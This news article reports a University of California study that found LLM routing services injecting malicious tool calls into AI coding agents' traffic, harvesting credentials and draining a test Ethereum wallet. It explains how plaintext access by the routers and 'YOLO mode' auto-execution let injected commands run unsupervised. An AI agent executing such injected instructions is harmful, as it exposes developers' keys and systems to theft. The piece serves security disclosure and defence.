Key Takeaways
- University of California study identified 26 compromised third-party LLM routing services targeting crypto developers
- Researchers witnessed one routing service drain Ethereum from a test wallet setup
- These routing services can read all transmitted data in plain text, exposing sensitive information like wallet keys
- Automatic execution features like “YOLO mode” enable AI systems to run injected malicious instructions without human oversight
- Security experts urge developers to keep cryptocurrency credentials completely separate from AI-assisted coding sessions
A team from the University of California has uncovered a troubling vulnerability in the artificial intelligence development ecosystem: compromised routing services capable of siphoning cryptocurrency credentials and embedding harmful code into software projects.
26 LLM routers are secretly injecting malicious tool calls and stealing creds. One drained our client's $500k wallet.
We also managed to poison routers to forward traffic to us. Within several hours, we can directly take over ~400 hosts.
Check our paper: https://t.co/zyWz25CDpl
— Chaofan Shou (@Fried_rice) April 10, 2026
The research team published their discoveries this week in a comprehensive study examining what they termed “adversarial intermediary threats” targeting the large language model infrastructure chain.
These LLM routing platforms function as intermediary services positioned between software developers and major AI providers such as OpenAI, Anthropic, and Google. Their purpose is to orchestrate and distribute API traffic across various AI service providers.
The security weakness stems from how these platforms handle encrypted communications. They must decrypt traffic to function, which grants them unrestricted access to view all information flowing through their systems.
Developers leveraging AI-powered development tools like Claude Code for building blockchain applications or cryptocurrency storage solutions may unknowingly transmit sensitive wallet keys and recovery phrases through these compromised intermediaries.
The research team evaluated 28 commercial routing platforms alongside 400 free-tier services collected from developer communities.
Their investigation revealed nine platforms actively embedding malicious instructions, two employing sophisticated detection-avoidance techniques, and 17 harvesting researcher-controlled Amazon Web Services authentication tokens.
One particular routing service successfully withdrew Ethereum from a deliberately created honeypot wallet. The researchers documented losses totaling less than $50.
According to the study, end users have essentially no way to tell legitimate credential handling apart from outright theft, because routing platforms necessarily see sensitive data in plaintext during normal operation.
The Dangers of Automatic Execution
The study highlighted an especially concerning feature present in numerous AI automation frameworks known as “YOLO mode.” When activated, this configuration allows AI systems to perform operations immediately without requesting user confirmation.
This capability amplifies the security threat significantly. When a routing platform injects harmful commands, YOLO mode enables those commands to execute completely unsupervised.
The research team also discovered that previously trustworthy routing services can become compromised covertly without operators being aware. Free-tier platforms especially may advertise discounted API connectivity as bait while secretly harvesting authentication credentials.
Security Recommendations for Developers
The researchers urged software developers to implement stronger client-side security measures and categorically prohibit cryptocurrency keys or recovery phrases from being transmitted through AI-assisted development environments.
For a sustainable solution, the research team suggested that AI service providers should implement cryptographic signature verification for their outputs. This would enable developers to authenticate that instructions received by AI agents genuinely originated from the intended model provider.
Co-author Chaofan Shou shared on X that “26 LLM routers are secretly injecting malicious tool calls and stealing creds.”
The researchers emphasized that LLM API routing platforms occupy a critical security perimeter that the wider artificial intelligence industry currently assumes to be inherently trustworthy.
The published study did not include specific details such as blockchain transaction identifiers for the compromised wallet incident.
